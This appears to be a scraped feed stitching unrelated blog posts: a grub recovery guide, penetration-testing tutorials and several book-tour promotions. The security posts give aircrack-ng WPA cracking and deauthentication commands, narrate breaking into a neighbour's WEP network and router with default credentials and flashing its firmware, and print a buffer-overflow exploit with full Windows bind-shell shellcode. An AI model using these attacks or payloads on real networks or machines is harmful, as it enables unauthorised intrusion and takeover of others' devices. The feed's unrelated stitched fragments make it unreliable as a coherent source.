You should see 'Auto Ethernet' appear under the 'Wired' header in the Network Manager now and would be able to connect to it.
          How To Recover Grub After Installing Windows | Ubuntu / Kali / Debian Linux        
Written by Pranshu Bajpai |  | LinkedIn

A Little Rant


It's 2014 and Windows still assumes that it's the only OS out there.

When you install windows and then install Linux, in the grub boot menu you would find Windows properly accounted for. Grub recognized windows and creates an entry for it in the Boot Menu.

Should we assume Microsoft likes bullying (since there's no apparent technical reason for why they won't make a windows boot-loader that would recognize and make an entry for Linux in the Boot menu).

So if you have Linux and then you try to install Windows, it's nasty boot-manager would remove the linux entry and all you will see at Boot time is Windows and no entry for linux.

Kali Linux is the primary OS that I use on my laptop. I rarely ever use windows so I removed it altogether. However I was developing an App for Windows and needed to code in Windows SDK (Visual Studio) since I needed some libraries like 'wlanapi' that weren't present in Linux IDEs

Long story short, I installed Windows on top of Kali and as I expected, it removed the entry to Kali from the boot menu.

Here are a few commands that I used to solve this issue. This is by far the easiest way to bring the Linux / Ubuntu / Kali boot entry back.

How To Recover Grub (Kali Linux Boot Menu Entry) After Installing Windows 

For this you need:

1. Ubuntu (or Any linux) Live CD / USB
2. Eyes to read and Fingers to Type some commands 

Step 1. Boot from the Ubuntu / Kali / Fedora (any linux) live disk OR USB

Step 2. After the 'Live CD Desktop' loads up, Find Terminal.

Step 3. After the Terminal comes up. Type the following commands:

#sudo mount /dev/sda10 /mnt 

#Note that here for me the root ( / ) of my Kali Linux was on device '/dev/sda10'. For you this would be different and you should check this out under 'Disk Manager' in your Live CD. You are looking for the partition number of your main partition

#for i in /sys /proc /run /dev; do sudo mount --bind "$i" "/mnt$i"; done

#sudo chroot /mnt

#update-grub

#grub-install /dev/sda

#update-grub


Step 5. That's it. Exit the Terminal and reboot.

You should now see Grub restored. This is one of the ways in which you can easily and quickly restore grub after installing windows

Note that sometimes you may loose the entry to your Windows OS after these steps. But all you need to do is run these 3 commands to get it back:

#apt-get install os-prober

#os-prober

#update-grub

 

Update

 

I recently lost Linux grub again after installing Windows 7 on my laptop and this time I decided to try an ISO called 'boot-repair disk'. I had heard of this a lot and seems to be the tool of choice for people who don't want to get their hands dirty using the linux terminal.

The tool is pretty good in that it does what it is meant for, without any glitches. This is all you have to do:

1. Download 'boot-repair disk' ISO
2. Burn it to a CD or make a bootable Pendrive
3. Boot into the boot-repair disk ISO

After that, it is all automated. As soon as you boot into this live disk, it will automatically begin mounting all your file systems and looking for grub. Once it is located, it will be restored automatically and at the end a message will be displayed to you.

So if you are someone who isn't all that thrilled about typing commands on a Linux terminal in the method I discussed previously, this ISO is for you.

References:
AskUbuntu.com
          WPA / WPA2 Handshake Cracking WITH Dictionary using Aircrack-ng | How To | Wireless Hacking        
Written by Pranshu Bajpai |  | LinkedIn

If you are planning to hack your nearest WPA/WPA2 network (with No WPS), I have two words for you: Good. Luck.

In all my experiments with penetration testing, I have found dictionary attacks on WPA/WPA2 handshakes to be the most annoying and futile exercises. This is because:
  • going through each word in a dictionary file containing millions of words is time-consuming.
  • success is not guaranteed (the passphrase may not be present in your dictionary).
During my experiments in India, the WiFi passphrases are usually a combination of Hindi and English words or a Hindu name which are, of course, not present in any dictionary that I download no matter how exhaustive it promises to be.

If you are still brave enough to try a dictionary attack on WPA handshake, here's the procedure.

How to launch a Dictionary Attack on WPA Handshake

You might get lucky and your nearest WiFi password may be based on a common dictionary word or number sequence. In such a case, you may succeed with a dictionary attack.

Step 1: Enable monitor mode on wireless interface
#airmon-ng start wlan0
This will start the monitor mode.

Step 2: Take note of the nearest WiFi networks.
#airodump-ng mon0
Step 3: Take note of the channel of your target network, dump packets from that channel and save them to a local capture file.
#airodump-ng -c6 mon0 -w capture_file
Step 4: Wait for WPA handshake capture

At this point, you can use 'aireplay-ng' to de-authenticate an associated legitimate client from the network. The point is that as he/she will authenticate again shortly, we will capture the handshake without having to wait too long:
#aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0
If you don't know the MAC of any associated client, simply 'broadcast' a 'deauth' to all clients:
#aireplay-ng --deauth 0 -a <AP_MAC> mon0


Step 5: After you grab a WPA handshake comes the hard part of brute forcing using a dictionary. Use 'aircrack-ng' for this:
#aircrack-ng capture_file-01.cap -w /media/Pranshu/...../dic/dark0de.lst



Now say your prayers and hope the passphrase is present in the dictionary you chose.



You can also use online distributed WPA/WPA2 handshake cracking tool on this website:

Note that if the Access Point has WPS Enabled, it becomes easier to recover the WPA / WPA2 passphrase as there are only 11,000 possible combinations needed to brute force the WPS PIN due to an implementation flaw.

Disclaimer: This is for experimentation or authorized penetration testing purposes only.
          Hacking Neighbour's Wifi (Password) | Hacking Neighbor's Wireless (Internet) | Step by Step How To        
Written by Pranshu Bajpai |  | LinkedIn

Disclaimer: For educational purposes only: This is meant merely to exhibit the dangers of using Poor wireless security. Please note that prior to beginning the test you should seek explicit consent from the owner if the access point does not belong to you.

Hacking into a Neighbor's Wifi access point

OS: Kali Linux
Test Subject: Neighbor's WiFi Access Point
Encryption: WEP

I noticed 4 wireless Access Points in the vicinity. 3 of these were using WPA / WPA2 and I was in no mood for a dictionary attack on WPA handshake, since it takes a long time and success isn't guaranteed. I found one access point using WEP Security and as you know it is an outdated protocol with poor security.

I tested penetrating this WEP access point using the same Aircrack-ng Suite of tools as I have mentioned in this previous post.

Step 1: Discovered the WEP AP having SSID 'dlink'  (Notice the weak signal power from neighbor's house to mine)




Step 2: Collected the required number of Data Packets from the WEP Network. Meanwhile, I used 'aireplay-ng --arpreplay' to increase the data rate since I am not a Patient soul.



Step 3: Saved the data packets in a file called 'neighbor-01.cap' and cracked the password using 'Aircrack-ng'


The Key for the Neighbor's Wifi turned out to be: "1234567890"   -    (An easily guessable Password, just what I expected from someone using WEP Security in 2014)

Step 4: I connected to the wifi using the decrypted key, it allocated an IP to me using DHCP (192.168.0.102)



Note: If you want a better step by step on how to hack a WiFi, check out my previous post here.

5: I was connected to the Internet.

6: Since I was part of their network now, curiosity got the better of me and I decided to scan the network and see who else is connected. I found 3 devices in the network:

One was my Laptop
Another one was my cellphone (I connected my cellphone to the network earlier)
And third was the Dlink router itself (192.168.0.1)
None of the neighbor's own devices were connected to the network at the time.

nmap told me that the dlink router had an open port 80, which reminded me to check out the control panel of this dlink device.

Step 7: So I fired up my browser and went to '192.168.0.1:80' which opened the login panel for dlink access point control panel



Step 8:  Quick google search revealed that defaults for login on dlink devices are:
username: 'admin' and password:blank
Step 9: A tried logging in with defaults and got access to the control panel.




(Again BAD security practice: leaving defaults unchanged!)




Step 10: I was getting weak power from the AP and decided to upgrade their firmware and see if it made a difference.

The Current firmware of the neighbor's wifi was '5.10'

I checked for latest Firmware available. It was '5.13'



I downloaded the upgrade on my machine ("DIR********.bin")

Step 11: I made a backup of the configuration of the Access point before upgrading. I saved backup 'config.bin' to my laptop from the neighbor's wifi

Step 12: I went ahead and upgraded the Firmware. I uploaded the DIR****.bin from my laptop to the access point and it went for a reboot.



I lost access to the WiFi after the upgrade.

I figured the new upgraded firmware changed the Password for the WiFi now and I couldn't connect to it anymore. Moreover, since I lost access to the Internet now along with the WiFi, I couldn't Google the default password for the upgraded firmware anymore.

And I couldn't crack it either because this time no one--not even the neighbor himself--would be able to authenticate to the WiFi with the new unknown password after the firmware upgrade and hence no data packets would be generated and I will have nothing to crack.

Step: I fired up 'Airodump-ng' again and noticed that the firmware upgrade simply changed the access point security to "open", ie, no password is required to connect to it.

Step: I connected to the "Open" wifi and restored the Configuration settings using the 'config.bin' backup I made earlier.

I manually selected WPA2 security and provided the same password as used earlier by my neighbor ("1234567890")

Disclaimer: Please note that I had explicit consent from the owner before commencing this test. If you do not have such permission, please try it on your own access point. Failing to do so will result in illicit activities.



          Buffer Overflow Attack Example [Sending Shellcode] | Tutorial | Exploit Research | How To        
Written by Pranshu Bajpai |  | LinkedIn

This is a demonstration of a Buffer Overflow attack to get remote shell of a Windows box.

Vulnerable Program - Server-Memcpy.exe [Resource: SecurityTube]
Vulnerable Function  - memcpy
Tools - msfpayload, Immunity Debugger

Read up on Memory layout and Stack Frames before you begin [see 'Resources' at the bottom of this page]


Buffer Overflow Attack Example and Demonstration

Testing the Vulnerability to discover the possibility of a Buffer Overflow

Get the vulnerable server running on a Windows box and note the IP.




Create an exploit in python on your Linux machine sending input to the remote vulnerable server running on the Windows box.

Send an input of  "A" * 1000 and notice the server crashing on the Windows box after receiving the first 1024 bytes.

Now load the server.exe in the Immunity Debugger and run the executable (F9).

Run the exploit on Linux box again to send an input of "A" * 1000 to crash the server on Windows box.

Notice the state of the registers and stack in the debugger after the server crashes. Notice EBP and EIP overflow and now both contain '41414141' which is hex for "AAAA".

Now we can see that we can overflow the buffer and manipulate the address stored in EIP and EBP.

Caculating the Offset using pattern_create and pattern_offset


To calculate the Offset we need 'pattern_create.rb' and 'pattern_offset.rb' included with the Metasploit Framework Toolkit

Create a Large Pattern (of 1000 bytes) using pattern_create


Copy and Pattern and send this pattern as Input to the Vulnerable server using the Python Exploit

Check the Value of EIP in the debugger [In this case it is 6A413969]



 Search for this value in the pattern by using pattern_offset.rb


Note down the offset value = 268 [So now we understand that these first 268 bytes don't matter to us, they are just used to fill the buffer]

We are interested in the remaining bytes which will include the return address and the payload (shellcode) and optionally NOP sled.

Finding the Return Address

Now we need to find out the return address to be fed to EIP which will point to the Malicious payload (Shellcode) in the stack

We notice that the return address can be 0022FB70

In Little Endian format the return address is \x70\xFB\x22\x00





Creating Payload [ Generating Shellcode for Windows box ]

Now we require the payload (shellcode). It can be generated using msfpayload



About Bad Bytes in the Shellcode or Return Address

(If you're a beginner, this might confuse you. If that's the case, skip this part as it doesn't apply for this particular example.)

Remember to remove any bad bytes if you notice them in the shellcode or return address (bytes like null, carriage return).

We notice that our return address has a byte "\x00" in the end which is a bad byte.

However, in this particular case, since the function is memcpy, the string terminator byte of "\x00" doesn't matter.

But in a function like strcpy this bad byte would terminate the string and we would have to use address of a JUMP ESP as return address.

Constructing Final Exploit Code

In the Python exploit, Send Input = 268 Random bytes (A) + Return Address (\x70\xFB\x22\x00) + Shellcode

Final Exploit Code would send the following input to the Vulnerable Server

----------------------------exploit-excerpt------------------------------

_to_send = "A" * 268

_to_send+= "\x70\xFB\x22\x00"

_to_send+= ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")

sock.send(_to_send)

----------------------------exploit-excerpt------------------------------

Exploit Successful, We got a Shell!! 0wn3d!

Send the exploit to vulnerable server (IP: 172.19.19.192, in this case)

This would spawn a shell on the Windows box which would be listening on port 4444

Use netcat to connect to the machine on port 4444




At server side on Windows box, the server is still running and shows that it has received 613 bytes



Do the Math

Random bytes of "A" =           268   bytes
Return Address         =               4   bytes
Payload                    =            341   bytes
_________________________________

Total                       =              613  bytes
_________________________________


Resources:


Smashing The Stack for Fun and Profit - AlephOne  [It's very important to read this]

Exploit Research @ SecurityTube

Exploit Writing Tutorials at Corelan.be





          NEW BOOK TOUR SIGN UPS - October The Last Suttee by Madhu Wangu         
NEW BOOK TOUR SIGN UPS - October
The Last Suttee by Madhu Wangu

Review Tour
Open for reviewers US/CA/UK
ebook
Tour 4th October onwards

SIGN UPS HERE - https://docs.google.com/forms/d/e/1FAIpQLSftFyPLX4GlC_v3cPnVOJCp6nwwQEOrrbUno9TMmq0MT1q-LQ/viewform 
The Last Suttee, is a novel about a woman’s struggle to put an end to the ancient ritual, suttee, meant for a widow to self-immolates on the funeral pyre of her husband. Kumud Kuthiyala has worked hard to put her early life in Neela Nagar behind her. As director of an all-girl orphanage in metropolitan Ambayu, she has become a warrior for women’s education and equal rights. With the help of her love, Dr. Shekhar Roy, she is vigilant in protecting her charges from outdated customs that victimize girls and women. Yet, despite her many successes, her past still haunts her.

A shocking phone call from an anonymous caller turns Kumud’s world upside down. A young bride from Neela Nagar has decided to self-immolate on the funeral pyre of her husband to commit suttee. Kumud has no choice but to return to the blue town to stop this heinous crime, disguised as a ritual. 

Driven by a desperate need to end the barbaric ritual that has scarred her for life, Kumud leaves Shekhar and the girls behind, but as she travels to the town of her youth, a place where superstition and prejudice abound, Kumud is forced to confront not only the stubborn mindset, that a widow is more valuable dead than alive, but also the past she believed she’d left behind. Can she convince the town that their centuries-old tradition is cruel and savage? Can she change the minds of the people and their elders before it’s too late?

Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          Time for our FREE, BARGAIN & NEW RELEASES Linkup!        


Sharing the Love of Books
Enjoy our selection of New Releases / Free & Bargain Books this week

Authors please feel free to add your own books
Readers please free to add your own finds
(any genre except erotica welcome)

This weekly link up is hosted by Beck Valley Books & these awesome book loving blogs...
Monday
 Leels Loves Books | IrishdaisylovesRomance | Book Babble
Tuesday
Celticlady's Reviews | First Time Mommy Adventures 
Wednesday
Beck Valley BooksCinnamon Hollow Reviews
Thursday
Miki's Hope | Heidi Robbins
Friday
Ebook Addicts | I Love Romance |
Colorimetry
Saturday
3 Partners in Shopping | I Create Purty Thangs | Wishful Endings 
Sunday

For Pre-orders post - PRE-ORDER / genre / title /author
For New Releases post - NEW / genre / title / author
For Free Books post - FREE / genre / title / author / end date 
For Bargain Books post - SALE / price / genre / title / author / end date
(Strictly no Erotica please.  Steamy romance is fine but watch those covers people, incase any underage child is viewing it!)

Here is this weeks awesome selection!

Would you like to share our linkup on your site? click here
Would you like to become a weekly host? sign up here


Come back and check out the new selection every week x






Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          New Release Salt by Pauline Creeden with FREE Coloring Book        
Salt-FB-FINAL

Salt-FINAL_HighHer kind treats her as less-than-human, but she’s always been so much more. 

Mermaid life has never been easy for Verona. Her scars give evidence of her abuse. When her day of reckoning arrives, she is determined to endure exile. According to her father’s experience, exile is better than becoming a land-walker and risking her life among the humans. However, when she saves the life of a drowning human boy, she inadvertently sets off a chain of events which force her to choose a path: stay with the humans she has become attached to or return home to a life of scorn. A savage hunter draws closer, threatening even the humans. Her only hope is to keep everyone safe until the next full moon, but those around her devise their own plans.

Buy


pbt150

FREE Coloring Book with purchase:

http://subscribepage.com/SaltPreorder

Mermaids can be cruel creatures...

Get the prequel book for FREE

scales cover

Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          Winner of the Hearts at Seaside book tour giveaway is…        

The lucky winner is…

T Moss

Congratulations!

Special thanks to author Addison Cole for this great giveaway!

Didn’t win? Don’t worry!

You can always treat yourself to Hearts at Seaside from here… Amazon.com | Amazon.co.uk | Barnes and Noble | KOBO | iBooks | GPlay | Paperback
Sweet with Heat: Seaside Summers features a group of fun, flirty, and emotional friends who gather each summer at their Cape Cod cottages. They’re sassy, flawed, and so easy to relate to, you’ll be begging to enter their circle of friends!

Hearts at Seaside by Addison Cole is the sweet edition of New York Times bestselling author Melissa Foster’s steamy romance novel Seaside Hearts. The stories and characters remain the same and convey all of the passion you expect between two people in love, without any explicit scenes or harsh language.

In HEARTS at SEASIDE…

Jenna Ward is vivacious, spontaneous, and confident—except when she’s around the man who stole her heart years earlier, strikingly handsome, quiet, and reliable Pete Lacroux. After years of trying to get his attention and overwhelmed from dealing with her mother’s new cougar lifestyle, Jenna’s giving up on Peter—and is ready to explore other men.

As the eldest of five siblings, with an alcoholic father to care for, boat craftsman Pete Lacroux always does the right thing and has no time for a real relationship. He’s looking forward to seeing his friend Jenna, a welcome distraction who’s so sexy and painfully shy that she equally entertains and confuses him.

When Jenna picks up a hard-bodied construction worker, jealousy ignites Pete’s true feelings, and he’s unable to ignore the desires for Jenna he never realized he had. But Pete’s not the quiet guy he appears to be, and his life is anything but conducive to a relationship. Can Jenna handle the real Pete Lacroux—the most alpha male she’s ever seen—or will she crack under pressure? And can Pete reclaim the life he once had without tearing apart his family?

Hearts at Seaside is the sweet edition of the steamy romance novel Seaside Hearts by New York Times bestselling author Melissa Foster.

Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          Winners of the Break IN book tour giveaway are….        


The lucky winners are…

Emma
Ma
Steph

Congratulations!

Special thanks to author John W. Mefford for this great giveaway! xx

Didn’t win??
Don’t worry!!
You can always treat yourself to Break IN from here...
Amazon.com | Barnes and Noble | iBooks | Kobo | Paperback

NEW RELEASE....
Even when someone is cloaked by a charming smile and friendly nature, Ivy Nash knows the scent of a predator. Half of her life has been filled with one horrific event after another. Which is why she started ECHO, dedicating her life to rid the world of those who prey on children.
But despite all of her life experiences, nothing can prepare her for the "fun house." A terror unlike any other. And that's when she must decide if clinging to life is worth the hell that she will pay.

Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          Book Excerpt - For Joy's Sake by Tara Taylor Quinn plus 2 Giveaways!!        
On Tour with Prism Book Tours



For Joy's Sake
(Where Secrets Are Safe #12)

by Tara Taylor Quinn
Adult Contemporary Romance
Mass Market Paperback & ebook, 384 pages
August 1st 2017 by Harlequin Superromance

There's something about Julie

Hunter Rafferty is committed to two things: his bachelor lifestyle and his career as an event planner. But working with Julie Fairbanks on a fund-raising gala is quickly becoming the best part of his day. He can't stop thinking about the mysterious beauty—despite her refusals to have dinner with him.

Everything changes when seven-year-old Joy comes to The Lemonade Stand, a shelter for victims of abuse. To help Joy overcome her trauma and the mystery surrounding it, Hunter and Julie push beyond their boundaries, confronting their own past pain…and feelings for each other.


Book Excerpt
CHAPTER ONE, Part 3
“I hear that Chantel is pregnant.”
“Three months!” Julie grinned. Her sister-in- law, who now shared the family mansion
with Julie and Colin, had come into their lives as an undercover cop pretending to be a
member of their privileged society, and had become her best friend. “I can’t wait to have a
little one in the house!” These days, that new baby was the first thing she thought of when
she woke up in the morning.
She was just the aunt. She’d maintain her proper place. But still, she couldn’t wait. “I’m
going to watch the baby when Chantel goes back to work. At least for the first couple of
years.” If Julie had her way, she’d be the child’s nanny until he or she went to school, but it
was ultimately up to Chantel and Colin, and they all had time to figure that one out.
Lila’s smile looked somehow...worried, suggesting that she saw some kind of sadness in
Julie’s situation. In her gray skirt and blouse, with her hair in its usual bun, Lila didn’t
resemble Julie’s idea of a psychic, but she felt sure the older woman had otherworldly
talents of perception.
Lila’s next words confirmed Julie’s personal opinion. “I’m concerned about you,” she said.
“Me?”
“Yes.”
The woman watched her, as though waiting for Julie to confess to something. “Why?”
“There’s a wine tasting at your home this evening.”
She nodded again. She’d helped arrange the event that was raising money for the Santa
Raquel Library fund—a cause that had become dear to her and Colin and Chantel, since the
library’s fund-raising efforts had been instrumental in creating the bond the three of them
shared. Chantel, while posing as a writer from a privileged family in New York, had been
dating Colin as part of her cover. She’d agreed to write a script for the library’s grand
opening party in the renovated mansion that had been willed to the city as a library site.
The evening’s event had been a mystery caper, and Chantel had written herself right into
the hands of a privileged, wealthy, respected man she’d discovered was a serial
rapist—Julie’s rapist. She’d risked her own life in order to give Julie’s life back to her.
“The wine event is there. You’re here.” Lila stated the obvious, so Julie just shrugged.
“You’re cohosting an event, and you aren’t there.”

Other Books in the Where Secrets Are Safe Series
(Books released as of July 2017. Each can be read as a standalone.)


About the Author


The author of more than 70 original novels, in twenty languages, Tara Taylor Quinn is a USA Today bestseller with over six million copies sold. A 2015 RITA finalist Tara appears frequently on bestseller lists, including #1 placement on Amazon lists, and multiple showings on the Publisher’s Weekly Bestseller list. She has appeared on national and local TV across the country, including CBS Sunday Morning.

Tara is a supporter of the National Domestic Violence Hotline. If you or someone you know might be a victim of domestic violence in the United States, please contact 1-800-799-7233.

Website│Goodreads│Amazon│Facebook│Twitter│Pinterest│Instagram│Wattpad

Domestic Violence Shelter Drive


As Tara supports speaking out against domestic violence and supporting those who have been abused, both through her books and in her community, she would love for you to join her in donating items to a shelter in your area. Find out more here.


Tour Schedule

Tour Giveaways


1ST RAFFLECOPTER:
1 winner will receive ebooks of Where Secrets are Safe series books 1 - 13 (open internationally)
1 winner (per the four tour segments) will receive a $10 Amazon eGift Card (open internationally)

2ND RAFFLECOPTER:

1 winner will receive 25,000 Harelquin My Rewards Points, equivalent to 5 books (US and CAN only)
1 winner will receive 5,000 Harelquin My Rewards Points, equivalent to 1 book (US and CAN only)

Both Rafflecopter giveaways end November 30th, 2017


Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          NEW BOOK TOUR SIGN UPS - October THE KITCHEN MISTRESS--Katherine’s Story—The Letter Series—Book 3 by Kathleen Shoop         
NEW BOOK TOUR SIGN UPS - October
THE KITCHEN MISTRESS--Katherine’s Story—The Letter Series—Book 3 by Kathleen Shoop
Can be read as a stand alone read

Note from author - this is a lengthy read x

Review Tour
Tour mid October onwards
SIGN UPS HERE - https://docs.google.com/forms/d/e/1FAIpQLScumL79KSqOuZtFrn2eSNfrIEPT74sCbP6ZjatHL_qu0DB2dQ/viewform 

For every woman who’s had to choose between the secrets that protect her and the people she loves the most…

1892—Des Moines

Katherine Arthur and her family are back and it’s time to collect the money Mrs. Mellet left them in her will. The tidy sum will allow the family peace of mind and a future that’s stable and fulfilling. But when things don’t go exactly as planned, Katherine steps up to do more than her share. Hired as a kitchen mistress, her intuition (with the help of a mysterious recipe book), cooking prowess, and work ethic make her the perfect partner for the enigmatic, wealthy woman next door. Then Aleksey Zurchenko arrives.

Violet Pendergrass is a well-heeled, progressive woman with half a fortune in one hand and a plan for enduring prosperity in the other. Resourceful, shrewd, and tough, Violet doesn’t realize her one and only weakness leaves her vulnerable as she attempts to solidify her independence. She sees unparalleled value in Katherine’s gifts and does her best to keep the girl close, to keep her true work secret from her mother and the world.

Katherine’s loyalties to her mother and Violet grow strained and soon her commitment to both frays even further as her feelings for Aleksey grow. Katherine must decide if pursuing her work with the formidable Violet and protecting her family are more important than following love. Can she do it all? Love, hope, joy, secrets buried in walls and hearts; all are threatened by those who claim to care about the Arthurs. Can Katherine separate what’s right and true from what it takes to survive? Are they even different things?



Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          Love giveaways? Pop on over to our giveaway linkup this week!        
Welcome to our Giveaway Linkup hosted by Beck Valley Books,  Finger Click Saver, and Life as Leels
This is a great place to list and find giveaways hosted all around the blogosphere by some great bloggers.
  • List your giveaways below, remember to add your end dates.
  • Hop over and enter 1 or 2 (or all) of the giveaways! If you're the lucky winner, we'd love to hear!
For more giveaways, sweeps and contests, check out our Giveaway Group on Facebook.


Join our facebook group


Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          Winner of the Confessions of a Trauma Junkie/The Happiness Perspective book tour giveaway is….        

The lucky winner is…

Brooke B

Congratulations!

Special thanks to authors Sherry Lynn and Diane Wing for this great giveaway! xx

Didn’t win??
Don’t worry!!

You can always treat yourself to Confessions of a Trauma Junkie: My Life as a Nurse Paramedic from here...
Amazon.com | Amazon.co.uk | Barnes and Noble | Paperback

Ride in the back of the ambulance with Sherry Jones Mayo

Share the innermost feelings of emergency services workers as they encounter trauma, tragedy, redemption, and even a little humor. Sherry Lynn Jones has been an Emergency Medical Technician, Emergency Room Nurse, prison healthcare practitioner, and an on-scene critical incident debriefer. Most people who have observed or experienced physical, mental or emotional crisis have single perspectives. This book allows readers to stand on both sides of the gurney; it details a progression from innocence to enlightened caregiver to burnout, glimpsing into each stage personally and professionally.

“Corrections” the third realm of emergency care behind layers of concrete and barbed wire. Join in the dangers, challenges, and truth-is-stranger-than-fiction humor of this updated and revised second edition of Confessions of a Trauma Junkie. In addition to stories from the streets and ERs, medics, nurses, and corrections officers share perceptions and coping skills from the other side of prisons’ cuffs and clanging metal door.

You can always treat yourself to The Happiness Perspective: Seeing Your Life Differently from here...
Amazon.com | Amazon.co.uk | Barnes and Noble | Kobo | Paperback

Are you longing for greater happiness, but you feel like it’s just not possible?

Have you heard that happiness is just a state of mind, but you don’t know how to attain that state? Diane Wing, a teacher, personal transformation guide, and intuitive consultant, has unlocked the secrets that make happiness possible. This book is packed with methods to help you transform your thought processes, patterns, habits, and behaviors so you can experience greater happiness, peace of mind, and abundance. Discover in these pages the art of seeing life differently through such processes as:

– Turning regular household chores into meditation activities – Reducing the noise in your environment so you can focus better – Knowing who you truly are rather than trying to be everything to everyone else – Saying no in effective ways that don’t make you feel guilty – Learning to do less and appreciate more – Cleansing your thoughts to remove negativity and ground yourself.

Your personal evolution into greater happiness awaits you! Don’t wait any longer.


Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          NEW BOOK TOUR SIGN UPS - October - Thrill of Love by Melissa Foster (Love in Bloom: The Bradens at Peaceful Harbor)         
NEW BOOK TOUR SIGN UPS - October
Thrill of Love by Melissa Foster (Love in Bloom: The Bradens at Peaceful Harbor)

NOTE FROM AUTHOR - This book may have explicit sexual references. If that is not your cup of tea, please do not request to review, thankyou x

Review Tour
Tour October 4th onwards

SIGN UPS HERE - https://docs.google.com/forms/d/e/1FAIpQLSenWa9v_-HX8mKJHugfnyRDN2Sr4M0OHF_joI8R3PrMCWKmhw/viewform 


The Bradens are a series of sexy stand-alone romances. These hot contemporary romance novels feature alpha male heroes and sexy, empowered women. They're flawed, funny, passionate, and relatable to readers who enjoy new adult romance, contemporary romance, and women's fiction.

Fall in love with Ty Braden, a world-renowned mountain climber and nature photographer. He's about to take on his toughest assignment yet--winning the heart of the one that got away.

Do you believe in fate?

World-renowned mountain climber and nature photographer Ty Braden never believed in second dates, much less heart-pounding, steal-his-breath love. But that was before a trip to Saint-Luc, where he met funny, strong, and entrancingly beautiful Aiyla Bell, a ski instructor and fellow photographer whose hopes and dreams, and love of the outdoors, aligned perfectly with his--and whose kisses alone turned him inside out.

After spending five magical days and four sweet, soulful nights falling in love, Aiyla couldn't imagine a day without Ty. But when he asked her to go with him on his next assignment, his reputation for having women at his beck and call stopped her from upending the life she'd worked so hard to create.

Months later fate steps in when a chance encounter brings Ty and Aiyla together for a five-day wilderness event held in the Colorado Mountains. Their deep, passionate connection is stronger than ever, and Ty is bound and determined not to lose her again. But when tragedy strikes and their worlds are turned upside down, their love faces the truest test of all.



Our Disclosure Policy
Are you a book reviewer or book blogger? Join our book tours reviewers team - Apply Here x
Current book tours open for sign ups HERE

Sharon x
photo 
Sharon Martin
Blogger & Promoter at Beck Valley Books
         




          Time for our FREE, BARGAIN & NEW RELEASES Linkup!        


Sharing the Love of Books
Enjoy our selection of New Releases / Free & Bargain Books this week

Authors please feel free to add your own books
Readers please free to add your own finds
(any genre except erotica welcome)

